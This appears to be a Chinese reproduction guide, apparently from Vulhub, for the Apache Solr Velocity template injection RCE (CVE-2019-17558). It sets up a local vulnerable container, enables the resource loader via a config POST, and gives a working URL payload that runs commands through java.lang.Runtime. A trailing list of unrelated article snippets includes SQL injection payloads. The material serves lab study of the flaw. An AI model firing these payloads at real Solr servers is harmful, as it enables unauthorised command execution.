whatday
whatday

apache solr velocity 注入远程命令执行漏洞 (cve-2019-17558)

Apache Solr 是一个开源的搜索服务器。

在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。

具体漏洞原理和POC可以参考:

  • https://nvd.nist.gov/vuln/detail/CVE-2019-17558
  • https://issues.apache.org/jira/browse/SOLR-13971
  • https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
  • https://github.com/jas502n/solr_rce

漏洞环境

执行如下命令启动一个Apache Solr 8.2.0服务器:

docker-compose up -d

服务启动后,访问http://your-ip:8983即可查看到一个无需权限的Apache Solr服务。

漏洞复现

默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心:

http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

Vulhub里唯一的核心是demo

apache solr velocity 注入远程命令执行漏洞 (cve-2019-17558)_第1张图片

 

通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称:

POST /solr/demo/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

之后,注入Velocity模板即可执行任意命令:

http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

 

 

 

你可能感兴趣的:(apache solr velocity 注入远程命令执行漏洞 (cve-2019-17558))

  • SpringBoot读取properties中文乱码解决方案 大饼酥 springbootspringjava
    目录一、问题描述二、解决方案2.1、网络上的解决办法2.1.1、修改IDEA编码2.1.2、改为yml配置2.1.3、读取时设置编码2.2、重写资源加载类(个人推荐)一、问题描述由于业务需求需要在application.properties中配置一个带有中文字符串的参数,注入到业务类中,但是发现注入的中文是乱码的。大概情况如下所示:packagecom.cnstar.test;importorg.
  • 22-4 SQL注入攻击 - post 基于报错的注入 技术探索 Web安全攻防全解析sql数据库
    1、post基于错误单引号注入回显分析注入点位置已经发生变化。在浏览器中,无法直接查看和修改注入点。不过,可以通过使用相应的插件来完成修改任务。修改方法:(一般是网站前端做了限制,我们才需要用到bp绕开限制)要修改Less11注入点的请求,可以使用BurpSuite工具来捕获请求包,并使用其中的"Repeater"功能来进行修改。具体操作步骤如下:首先打开BurpSuite并设置代理,然后在浏览器
  • [第一章 web入门]SQL注入-2 weixin_40546436 渗透测试
    1通过updatexml取数据从页面发现有一个提示如果加上?tips=1的话,通过burpsuite发包可以通过updatexml来查看回显,可以通过这个取到数据下面是通过updatexml来注入,这时4步中用到语句name=admin’andupdatexml(1,concat(0x7e,(select(database())),0x7e),1)#&pass=bbname=admin’andup
  • java依赖注入方法 hqxstudying log4jjavaspringioc依赖
    依赖注入主要有以下几种方式,每种方式各有特点,适用于不同场景:构造函数注入方式:通过类的构造函数将依赖对象传入。示例:publicclassUserService{privatefinalUserRepositoryuserRepository;publicUserService(UserRepositoryuserRepository){this.userRepository=userRepos
  • 大数据集群架构hadoop集群、Hbase集群、zookeeper、kafka、spark、flink、doris、dataeas(二) 争取不加班! hadoophbasezookeeper大数据运维
    zookeeper单节点部署wget-chttps://dlcdn.apache.org/zookeeper/zookeeper-3.8.4/apache-zookeeper-3.8.4-bin.tar.gz下载地址tarxfapache-zookeeper-3.8.4-bin.tar.gz-C/data/&&mv/data/apache-zookeeper-3.8.4-bin//data/zoo
  • 从开源小白到 Apache Member,我的成长之路 开源小秘书 云栖社区Apache高并发
    我们走过的每一步路,都会留下印记,越坚实,越清晰。近日,Apache软件基金会(ASF)官方Blog宣布全球新增40位ApacheMember,张乎兴有幸成为其中一位。目前,全球共有771位ASFMember,中国仅13位。本文将分享作者从0基础的开源小白,一路走来的感触,希望把期间的经历分享出来,让更多的人看到,世界开源舞台的中国力量。只要有持续的付出,总会有所收获。初次参与开源2014年,我加
  • 时空屏障崩塌:14:28深圳AI-BioFab平行宇宙保卫战全纪实 HeartException 人工智能
    前言前些天发现了一个巨牛的人工智能免费学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站《时空屏障崩塌:14:28深圳AI-BioFab平行宇宙保卫战全纪实》副标题:抗癌疫苗冷链门关闭前3秒遭量子生物武器袭击,中国科学家启动长城时空盾改写人类文明存续方程2025年7月2日14:28:57光明科学城虫洞警报第184支疫苗即将注入液氮罐的刹那,B3层量子钟突现重影!14:28/15:4
  • 实时直击:全球首座AI-BioFab工厂72小时全息记录 HeartException 人工智能
    前言前些天发现了一个巨牛的人工智能免费学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站《实时直击:全球首座AI-BioFab工厂72小时全息记录》副标题:2025年7月2日深圳现场——癌症疫苗11天定制神话如何改写万亿生物经济规则本报深圳2025年7月2日电(记者徐远舟)此刻,位于光明科学城负三层的无菌车间内,液态机器人正将第4,817管CRISPR编辑液注入微流控芯片。墙上的量
  • 生命制造的读秒革命:全球首个AI-BioFab工厂72小时全息记录 HeartException 人工智能
    前言前些天发现了一个巨牛的人工智能免费学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站《生命制造的读秒革命:全球首个AI-BioFab工厂72小时全息记录》副标题:2025年7月2日14:04深圳现场——癌症疫苗定制最后3分钟如何改写万亿生物经济规则光明科学城2025年7月2日电(记者直击)负三层B区微流控平台红光闪烁,液态机械臂正将第9,217管CRISPR编辑液注入芯片。量子
  • 提名 Apache ShardingSphere Committer,说说方法
    优质资源分享学习路线指引(点击解锁)知识定位人群定位Python实战微信订餐小程序进阶级本课程是pythonflask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。Python量化交易实战入门级手把手带你打造一个易扩展、更安全、效率更高的量化交易系统文章首发在公众号(龙台的技术笔记),之后同步到博客园和个人网站:xiaomage.info就在前几天,收到了ApacheS
  • window.accountCenterFeedback详细解析 前端页面仔 开发语言javascripthtmlwindowsvuereact
    window.accountCenterFeedback表示访问浏览器全局对象window上的一个属性,通常用于管理账户中心(AccountCenter)的反馈功能。以下是详细解析:1.这是什么?定义:window.accountCenterFeedback是挂载在浏览器全局作用域(window)上的一个对象或方法,通常由前端代码或第三方SDK注入,用于控制账户中心的用户反馈功能(如弹窗、问卷、帮
  • Apache Seata < 2.3.0 raft反序列化漏洞 墨菲安全 ApacheSeata反序列化漏洞CVE-2025-32897
    【高危】ApacheSeata<2.3.0raft反序列化漏洞漏洞描述ApacheSeata(incubating)是一款开源的分布式事务解决方案,用于在微服务架构下提供高性能和简单易用的分布式事务服务。受影响版本中,SeataServer的Raft模块的CustomDeserializer直接通过Class.forName()加载用户可控的类名,未做安全校验,攻击者可借此利用服务端已有的恶意链实
  • 从性能优化赛到社区Committer,走进赵宇捷在Apache Fory的成长之路
    ApacheFory是一个基于JIT和零拷贝的高性能多语言序列化框架,实现了高效紧凑的序列化协议,提供极致的性能、压缩率和易用性。在多语言序列化框架技术领域取得了重大突破,推动序列化技术步入高性能易用新篇章!这一切,都源自全球开发者对开源的热忱。今天,一起走近这些用代码编织跨语言数据之网的Committer~一、自我介绍您的全名:赵宇捷当前职位/角色:后端开发工程师主要领域/方向:金融加入社区/项
  • Paper Reading《SoK: Prudent Evaluation Practices for Fuzzing》 小苑同学 安全性测试网络安全
    论文链接:https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=10646824IEEESSP20241Introduction(背景意义)模糊测试是发现软件漏洞的高效方法,被Meta、Google等企业广泛应用,且大量学术研究持续改进其技术(如覆盖反馈、领域扩展)。过去六年(2018-2023)中,顶级安全与软件工程会议上发表了超280
  • 喜讯!Apache SeaTunnel 荣获上海开源创新菁英荟优秀开源项目奖 数据库
    近日,在2025上海开源创新菁英荟上,ApacheSeaTunnel凭借信创生态适配与智能化技术突破,荣获「优秀开源项目奖」。这个由中国团队孵化的开源项目,已成为全球数据集成领域的标杆。信创生态:支持20+国产数据库的无缝对接SeaTunnel深度适配华为OpenGauss、阿里OceanBase等20+主流国产数据库,支持CDC(变更数据捕获)与高性能加载。在证券行业信创转型中,SeaTunne
  • SHELL/SSH基础知识(入门篇)-包含 shell 脚本语言的基本用法、 shell 脚本语言的基本用法、流程控制、函数 function、其它脚本相关工具、数组 array(欢迎留言交流) 云计算小曹同学 正则表达式centoslinux运维ssh
    目录1shell脚本语言的基本用法1.1shell脚本注释规范1.1.1shell脚本注释规范1.1.2执行(5种)1.1.3在远程主机运行本地脚本1.1.4检查shell脚本1.2shell变量1.2.1Shell中变量命名法则1.2.2变量赋值与引用1.2.3环境变量的查看设置和删除1.2.4只读变量1.2.5位置变量1.2.6退出状态码变量1.2.7展开命令行1.3退出状态码变量1.4展开命
  • C200系列开发:C200PC_C200PC物联网应用开发 zhubeibei168 机器人及导航物联网strutsservlet机器人机器人二次开发
    C200PC物联网应用开发1.物联网概述物联网(InternetofThings,IoT)是指通过互联网将各种物理设备、车辆、家电、传感器等连接起来,使其能够相互通信和交换数据的技术。在工业控制系统中,物联网的应用可以大幅提高生产效率、降低成本、提高安全性,并实现远程监控和管理。Honeywell的C200PC系列控制器是专门为工业物联网应用设计的,具备强大的数据处理能力和网络通信功能。1.1物联
  • 便利的隐形代价?智能设备正在“偷听”你的生活——物联网时代的隐私深度危机 二十十十十十 生活
    引子:从“智能冰箱”泄露百万信用卡说起2023年,某知名品牌智能冰箱被曝存在严重漏洞。黑客通过入侵其联网系统,不仅能窃取用户存储在App中的支付信息,更可远程激活冰箱内置麦克风,持续监听厨房对话。事件导致超百万用户数据泄露,成为物联网隐私威胁的典型案例。隐私窃取:不只是麦克风这么简单物联网设备正成为隐私泄露的重灾区:1、无处不在的“感官”麦克风监听:智能音箱、电视、手机、甚至部分智能家电时刻准备响
  • 华为认证二选一:物联网 VS 人工智能,你的赛道在哪里? 博睿谷IT99_ 物联网人工智能华为华为认证
    一篇不讲情怀只讲干货的科普指南一、华为物联网&人工智能到底在搞什么?华为物联网(IoT)的核心是“万物互联”。通过传感器、通信技术(如NB-IoT/5G)、云计算平台(如OceanConnect),将物理设备(车、路灯、工厂机器)连入网络,实现数据采集、远程控制和智能决策。大白话就是:它让哑巴设备学会“说话”。华为人工智能(AI)的核心是“让机器学会思考”。聚焦大模型训练、部署与应用(如昇腾AI解
  • C#测试实战:从集成到端到端——代码级深度解析与工程化实践 墨夶 C#学习资料c#开发语言
    ——零侵入框架设计、自动化工具链与真实场景模拟为什么需要“测试金字塔”?在微服务架构下,C#应用的复杂性呈指数级增长。集成测试(IntegrationTesting)和端到端测试(E2ETesting)是保障系统稳定性的两大核心防线:集成测试:验证模块间协作,定位接口与依赖问题端到端测试:模拟真实用户场景,确保全链路流程无误本文通过代码实战,从依赖注入模拟到浏览器自动化,构建一个企业级测试框架,并
  • 业界优秀零信任安全管理系统产品介绍 scuter_yu 安全网络
    腾讯iOA零信任安全管理系统腾讯iOA零信任安全管理系统是基于腾讯自身无边界零信任企业网的最佳实践推出的终端访问管理方案。它以可信终端、可信身份、可信应用、可信链路为核心,全方位保护企业终端安全,无需VPN即可实现远程办公,且支持公有云和本地云部署模式。该系统依托腾讯安全威胁情报中心,日均拦截超10亿次攻击,其客户端轻量化设计兼容多平台,员工接受度高,助力企业安全上云和数字化转型。深信服零信任iT
  • C++包管理工具:conan2使用教程 laplaya conanc++开发语言
    本部分的目的是通过实际示例引导你了解Conan的核心功能:从使用Conan打包的现成库,到如何封装自己的库并将其与所有预编译的二进制文件一同存储到远程服务器上。1.教程(TUTORIAL)本章节旨在通过实际示例引导您了解Conan的核心功能。从使用Conan中心或其他来源提供的预打包库,到如何打包您自己的库并将其与预编译的二进制文件一起存储在远程服务器上。1.1使用包(Consumingpacka
  • C#.NET Autofac 详解 c#.net
    简介Autofac是一个成熟的、功能丰富的.NET依赖注入(DI)容器。相比于内置容器,它额外提供:模块化注册、装饰器(Decorator)、拦截器(Interceptor)、强o的属性/方法注入支持、基于约定的程序集扫描等特性。核心组件ContainerBuilder:用于注册服务的构建器IContainer:服务容器,负责解析依赖ILifetimeScope:生命周期作用域,管理对象生命周期M
  • 深入解析FastAPI:Python高效Web API框架 永不放弃yes
    本文还有配套的精品资源,点击获取简介:FastAPI是一个专为构建API设计的现代、高性能PythonWeb框架,它利用TypeHinting和Pydantic库简化了数据验证和文档生成。文章深入介绍了FastAPI的核心特性,如异步支持、类型提示、依赖注入、自动化API文档以及错误处理等。还探讨了FastAPI的部署和测试方法,提供了实践案例和代码示例。FastAPI因其简洁、高效、易于测试的特
  • 多bin技术:为LoRa项目赋能的高效远程升级方案 门思科技 技术分享网络服务器运维
    在物联网(IoT)领域,设备的远程维护和固件升级(OTA升级)是保障系统稳定、持续优化的重要环节。然而,对于采用LoRa或LoRaWAN等低功耗广域网(LPWAN)技术的项目而言,受限于带宽窄、数据包尺寸小(通常最大255字节)等特点,传统的大容量固件升级方式并不适用。为了更高效、更安全地实现远程升级,多bin方案(multi-binapproach)应运而生,成为LoRa项目不可或缺的关键技术之
  • DolphinScheduler 6 个高频 SQL 操作技巧 数据库
    摘要:ApacheDolphinScheduler系列4-后台SQL经验分享关键词:大数据、数据质量、数据调度整体说明在调研了DolphinScheduler之后,在项目上实际使用了一段时间,有了一些后台SQL实际经验,分享如下。进入DolphinScheduler后台数据库,我这里使用的是MySQL数据库。以任务名称包含“ods_xf_act”的任务为例。一、修改任务组操作UPDATEt_ds_
  • 【如何设置ssh免密登录】 岁月玲珑 linuxsshgithubgit
    设置SSH免密登录能够让你在不输入密码的情况下,通过SSH协议安全登录远程服务器。下面为你详细介绍设置步骤:1.生成SSH密钥对(若未生成)要生成SSH密钥对,可在本地终端执行以下命令:ssh-keygen-trsa-b4096-C"[email protected]"当系统提示你“Enterafileinwhichtosavethekey”时,你可以直接按回车键使用默认文件位置,也可以
  • Apache HTTP Server部署全攻略 Sally璐璐 运维apachehttp网络协议运维
    httpd简介httpd(ApacheHTTPServer)是一款历史悠久的开源Web服务器软件,由Apache软件基金会开发和维护。自1995年首次发布以来,Apache一直是Web服务器领域的领导者,以其稳定性、安全性和灵活性著称。根据W3Techs的最新统计,httpd支持着全球超过40%的网站运行,特别是在企业级应用中占据重要地位。httpd的主要特点包括:模块化架构:通过动态加载模块扩展
  • PyPI仓库 loggutils 组件内嵌恶意代码
    【高危】PyPI仓库loggutils组件内嵌恶意代码漏洞描述当用户安装受影响版本的loggutilsPython组件包时会窃取用户主机浏览器、剪贴板、系统文件等信息,并窃取键盘记录和摄像头截图,并对用户主机进行远控。MPS编号MPS-tzsc-gm4v处置建议强烈建议修复发现时间2025-06-30投毒仓库pip投毒类型恶意代码利用成本低利用可能性中影响范围影响组件受影响的版本最小修复版本log
  • NPM组件 betsson 等窃取主机敏感信息 墨菲安全 npm前端node.jsNPM组件投毒软件供应链安全主机信息窃取
    【高危】NPM组件betsson等窃取主机敏感信息漏洞描述当用户安装受影响版本的betsson组件包时会窃取用户的主机名、用户名、工作目录、IP地址等信息并发送到攻击者可控的服务器地址。MPS编号MPS-2nrw-lifd处置建议强烈建议修复发现时间2025-06-30投毒仓库npm投毒类型主机信息收集利用成本低利用可能性中影响范围影响组件受影响的版本最小修复版本betsson[1.0.0,99.
  • [黑洞与暗粒子]没有光的世界 comsci
         无论是相对论还是其它现代物理学,都显然有个缺陷,那就是必须有光才能够计算      但是,我相信,在我们的世界和宇宙平面中,肯定存在没有光的世界....      那么,在没有光的世界,光子和其它粒子的规律无法被应用和考察,那么以光速为核心的 &nbs
  • jQuery Lazy Load 图片延迟加载 aijuans jquery
    基于 jQuery 的图片延迟加载插件,在用户滚动页面到图片之后才进行加载。 对于有较多的图片的网页,使用图片延迟加载,能有效的提高页面加载速度。 版本: jQuery v1.4.4+ jQuery Lazy Load v1.7.2 注意事项: 需要真正实现图片延迟加载,必须将真实图片地址写在 data-original 属性中。若 src
  • 使用Jodd的优点 Kai_Ge jodd
    1.  简化和统一 controller ,抛弃 extends SimpleFormController ,统一使用 implements Controller 的方式。 2.  简化 JSP 页面的 bind, 不需要一个字段一个字段的绑定。 3.  对 bean 没有任何要求,可以使用任意的 bean 做为 formBean。   使用方法简介
  • jpa Query转hibernate Query 120153216 Hibernate
    public List<Map> getMapList(String hql, Map map) { org.hibernate.Query jpaQuery = entityManager.createQuery(hql); if (null != map) { for (String parameter : map.keySet()) { jp
  • Django_Python3添加MySQL/MariaDB支持 2002wmj mariaDB
    现状 首先,[email protected] 中默认的引擎为 django.db.backends.mysql 。但是在Python3中如果这样写的话,会发现 django.db.backends.mysql 依赖 MySQLdb[5] ,而 MySQLdb 又不兼容 Python3 于是要找一种新的方式来继续使用MySQL。 MySQL官方的方案 首先据MySQL文档[3]说,自从MySQL
  • 在SQLSERVER中查找消耗IO最多的SQL 357029540 SQL Server
    返回做IO数目最多的50条语句以及它们的执行计划。 select top 50   (total_logical_reads/execution_count) as avg_logical_reads,  (total_logical_writes/execution_count) as avg_logical_writes,  (tot
  • spring UnChecked 异常 官方定义! 7454103 spring
      如果你接触过spring的 事物管理!那么你必须明白 spring的 非捕获异常! 即 unchecked 异常! 因为 spring 默认这类异常事物自动回滚!! public static boolean isCheckedException(Throwable ex) { return !(ex instanceof RuntimeExcep
  • mongoDB 入门指南、示例 adminjun javamongodb操作
    一、准备工作 1、 下载mongoDB 下载地址:http://www.mongodb.org/downloads 选择合适你的版本 相关文档:http://www.mongodb.org/display/DOCS/Tutorial 2、 安装mongoDB A、 不解压模式: 将下载下来的mongoDB-xxx.zip打开,找到bin目录,运行mongod.exe就可以启动服务,默
  • CUDA 5 Release Candidate Now Available aijuans CUDA
    The CUDA 5 Release Candidate is now available at http://developer.nvidia.com/<wbr></wbr>cuda/cuda-pre-production. Now applicable to a broader set of algorithms, CUDA 5 has advanced fe
  • Essential Studio for WinRT网格控件测评 Axiba JavaScripthtml5
    Essential Studio for WinRT界面控件包含了商业平板应用程序开发中所需的所有控件,如市场上运行速度最快的grid 和chart、地图、RDL报表查看器、丰富的文本查看器及图表等等。同时,该控件还包含了一组独特的库,用于从WinRT应用程序中生成Excel、Word以及PDF格式的文件。此文将对其另外一个强大的控件——网格控件进行专门的测评详述。 网格控件功能 1、
  • java 获取windows系统安装的证书或证书链 bewithme windows
          有时需要获取windows系统安装的证书或证书链,比如说你要通过证书来创建java的密钥库  。 有关证书链的解释可以查看此处 。   public static void main(String[] args) { SunMSCAPI providerMSCAPI = new SunMSCAPI(); S
  • NoSQL数据库之Redis数据库管理(set类型和zset类型) bijian1013 redis数据库NoSQL
    4.sets类型         Set是集合,它是string类型的无序集合。set是通过hash table实现的,添加、删除和查找的复杂度都是O(1)。对集合我们可以取并集、交集、差集。通过这些操作我们可以实现sns中的好友推荐和blog的tag功能。         sadd:向名称为key的set中添加元
  • 异常捕获何时用Exception,何时用Throwable bingyingao
    用Exception的情况 try {        //可能发生空指针、数组溢出等异常         } catch (Exception e) {          
  • 【Kafka四】Kakfa伪分布式安装 bit1129 kafka
    在http://bit1129.iteye.com/blog/2174791一文中,实现了单Kafka服务器的安装,在Kafka中,每个Kafka服务器称为一个broker。本文简单介绍下,在单机环境下Kafka的伪分布式安装和测试验证   1. 安装步骤   Kafka伪分布式安装的思路跟Zookeeper的伪分布式安装思路完全一样,不过比Zookeeper稍微简单些(不
  • Project Euler bookjovi haskell
    Project Euler是个数学问题求解网站,网站设计的很有意思,有很多problem,在未提交正确答案前不能查看problem的overview,也不能查看关于problem的discussion thread,只能看到现在problem已经被多少人解决了,人数越多往往代表问题越容易。     看看problem 1吧: Add all the natural num
  • Java-Collections Framework学习与总结-ArrayDeque BrokenDreams Collections
            表、栈和队列是三种基本的数据结构,前面总结的ArrayList和LinkedList可以作为任意一种数据结构来使用,当然由于实现方式的不同,操作的效率也会不同。         这篇要看一下java.util.ArrayDeque。从命名上看
  • 读《研磨设计模式》-代码笔记-装饰模式-Decorator bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.io.BufferedOutputStream; import java.io.DataOutputStream; import java.io.FileOutputStream; import java.io.Fi
  • Maven学习(一) chenyu19891124 Maven私服
        学习一门技术和工具总得花费一段时间,5月底6月初自己学习了一些工具,maven+Hudson+nexus的搭建,对于maven以前只是听说,顺便再自己的电脑上搭建了一个maven环境,但是完全不了解maven这一强大的构建工具,还有ant也是一个构建工具,但ant就没有maven那么的简单方便,其实简单点说maven是一个运用命令行就能完成构建,测试,打包,发布一系列功
  • [原创]JWFD工作流引擎设计----节点匹配搜索算法(用于初步解决条件异步汇聚问题) 补充 comsci 算法工作PHP搜索引擎嵌入式
    本文主要介绍在JWFD工作流引擎设计中遇到的一个实际问题的解决方案,请参考我的博文"带条件选择的并行汇聚路由问题"中图例A2描述的情况(http://comsci.iteye.com/blog/339756),我现在把我对图例A2的一个解决方案公布出来,请大家多指点 节点匹配搜索算法(用于解决标准对称流程图条件汇聚点运行控制参数的算法) 需要解决的问题:已知分支
  • Linux中用shell获取昨天、明天或多天前的日期 daizj linuxshell上几年昨天获取上几个月
    在Linux中可以通过date命令获取昨天、明天、上个月、下个月、上一年和下一年 # 获取昨天 date -d 'yesterday'  # 或 date -d 'last day' # 获取明天 date -d 'tomorrow'   # 或 date -d 'next day' # 获取上个月 date -d 'last month' #
  • 我所理解的云计算 dongwei_6688 云计算
          在刚开始接触到一个概念时,人们往往都会去探寻这个概念的含义,以达到对其有一个感性的认知,在Wikipedia上关于“云计算”是这么定义的,它说:        Cloud computing is a phrase used to describe a variety of computing co
  • YII CMenu配置 dcj3sjt126com yii
    Adding id and class names to CMenu We use the id and htmlOptions to accomplish this. Watch. //in your view $this->widget('zii.widgets.CMenu', array( 'id'=>'myMenu', 'items'=>$this-&g
  • 设计模式之静态代理与动态代理 come_for_dream 设计模式
    静态代理与动态代理        代理模式是java开发中用到的相对比较多的设计模式,其中的思想就是主业务和相关业务分离。所谓的代理设计就是指由一个代理主题来操作真实主题,真实主题执行具体的业务操作,而代理主题负责其他相关业务的处理。比如我们在进行删除操作的时候需要检验一下用户是否登陆,我们可以删除看成主业务,而把检验用户是否登陆看成其相关业务
  • 【转】理解Javascript 系列 gcc2ge JavaScript
    理解Javascript_13_执行模型详解 摘要: 在《理解Javascript_12_执行模型浅析》一文中,我们初步的了解了执行上下文与作用域的概念,那么这一篇将深入分析执行上下文的构建过程,了解执行上下文、函数对象、作用域三者之间的关系。函数执行环境简单的代码:当调用say方法时,第一步是创建其执行环境,在创建执行环境的过程中,会按照定义的先后顺序完成一系列操作:1.首先会创建一个
  • Subsets II hcx2013 set
    Given a collection of integers that might contain duplicates, nums, return all possible subsets. Note: Elements in a subset must be in non-descending order. The solution set must not conta
  • Spring4.1新特性——Spring缓存框架增强 jinnianshilongnian spring4
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • shell嵌套expect执行命令 liyonghui160com
        一直都想把expect的操作写到bash脚本里,这样就不用我再写两个脚本来执行了,搞了一下午终于有点小成就,给大家看看吧.   系统:centos 5.x   1.先安装expect yum -y install expect   2.脚本内容: cat auto_svn.sh   #!/bin/bash
  • Linux实用命令整理 pda158 linux
    0. 基本命令   linux 基本命令整理    1. 压缩 解压   tar -zcvf a.tar.gz a   #把a压缩成a.tar.gz   tar -zxvf a.tar.gz     #把a.tar.gz解压成a    2. vim小结   2.1 vim替换   :m,ns/word_1/word_2/gc  
  • 独立开发人员通向成功的29个小贴士 shoothao 独立开发
    概述:本文收集了关于独立开发人员通向成功需要注意的一些东西,对于具体的每个贴士的注解有兴趣的朋友可以查看下面标注的原文地址。 明白你从事独立开发的原因和目的。 保持坚持制定计划的好习惯。 万事开头难,第一份订单是关键。 培养多元化业务技能。 提供卓越的服务和品质。 谨小慎微。 营销是必备技能。 学会组织,有条理的工作才是最有效率的。 “独立
  • JAVA中堆栈和内存分配原理 uule java
    1、栈、堆 1.寄存器:最快的存储区, 由编译器根据需求进行分配,我们在程序中无法控制.2. 栈:存放基本类型的变量数据和对象的引用,但对象本身不存放在栈中,而是存放在堆(new 出来的对象)或者常量池中(字符串常量对象存放在常量池中。)3. 堆:存放所有new出来的对象。4. 静态域:存放静态成员(static定义的)5. 常量池:存放字符串常量和基本类型常量(public static f
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他